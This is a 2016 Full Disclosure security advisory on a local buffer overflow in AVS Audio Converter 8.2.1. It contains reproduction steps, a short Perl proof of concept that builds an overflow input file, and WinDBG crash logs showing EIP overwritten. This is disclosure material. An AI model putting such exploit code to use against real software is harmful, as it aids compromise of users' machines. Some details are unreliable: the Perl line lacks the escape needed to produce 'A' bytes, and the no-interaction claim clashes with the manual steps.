
Date: Mon, 22 Aug 2016 14:58:09 +0200
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] AVS Audio Converter 8.2.1 - Buffer Overflow Vulnerability

Document Title:
===============
AVS Audio Converter 8.2.1 - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1920


Release Date:
=============
2016-08-22


Vulnerability Laboratory ID (VL-ID):
====================================
1920


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
AVS Audio Editor is an audio file editor of its primary function is for editing audio files. It is able to 
cut, join, combine or split audio files. All these operations are done with great precision to the hundredth 
of a second. You can work with files in .wav formats, Mp3, Pcm, M4A, Flac and many others.

(Copy of the Vendor Homepage: http://www.avs4you.com/AVS-Audio-Converter.aspx )



Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the AVS Audio Converter 8.2.1 software.


Vulnerability Disclosure Timeline:
==================================
2016-08-22:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
AVS4YOU
Product: AVS Audio Converter - Software 8.2.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered in the official software AVS Audio Converter V8.2.1.
The vulnerability allows local attackers to overwrite registers to compromise the local software process.

Vulnerability classic buffer overflow is in the AVS Audio Converter. An attacker can manipulate the
bit EIP register to execute the next instruction of their choice. Attackers can eg
execute arbitrary code with the privileges of the process. The attacker has a large unicode string to crush
the EIP register process. Finally, the attacker is able to process the takeover by a crushing of the
active program process to compromise the computer system.


Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1.  Download and install the AVS Audio Converter.exe    
2.  Run the code via perl script or perl
3.  A file format (poc.txt) will be created
4.  Open the generated file (poc.txt)
5.  Start the AVS Audio Converter software
6.  Attach a debugger like windbg, immunity or ollydbg
7.  Load the path location by software interaction or copy paste the file characters AAAAAAAAA+... as input to the Output Folder 
8.  Click to Browse function for the path
9.  Software will crash with unhandled exception and critical access violation
10. Watch the debugger logs were the eip is overwritten
11. Interact to manipulate the followup address
12. Successful reproduce of the local buffer overflow vulnerability!


PoC: Exploitation (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 9000;
open(MYFILE,'>>poc.txt');
print MYFILE $Buff;
close(MYFILE);
print "Local BOF PoC by ZwXn";


--- Debug Session Logs [WinDBG] ---
Access violation - code c0000005 
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77db38a0 esi=00000000 edi=00000000
eip=41414141 esp=0014f578 ebp=0014f598 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???

0:000> d 0014fab4
0014fab4  41414141
0014fab8  41414141
0014fabc  41414141
0014fac0  41414141
0014fac4  41414141
0014fac8  41414141
0014facc  41414141
0014fad0  41414141
0014fad4  41414141
0014fad8  41414141
0014fadc  41414141
0014fae0  41414141
0014fae4  41414141
0014fae8  41414141
0014faec  41414141
0014faf0  41414141
0014faf4  41414141
0014faf8  41414141
0014fafc  41414141
0014fb00  41414141
0014fb04  41414141
0014fb08  41414141
0014fb0c  41414141
0014fb10  41414141
0014fb14  41414141
0014fb18  41414141
0014fb1c  41414141
0014fb20  41414141
0014fb24  41414141
0014fb28  41414141
0014fb2c  41414141
0014fb30  41414141

Note: The access violation with the exception and followup offsets shows that the ecx & eip was overwritten.


Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the avs software is estimated as high. (CVSS 6.3)


Credits & Authors:
==================
ZwX - [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/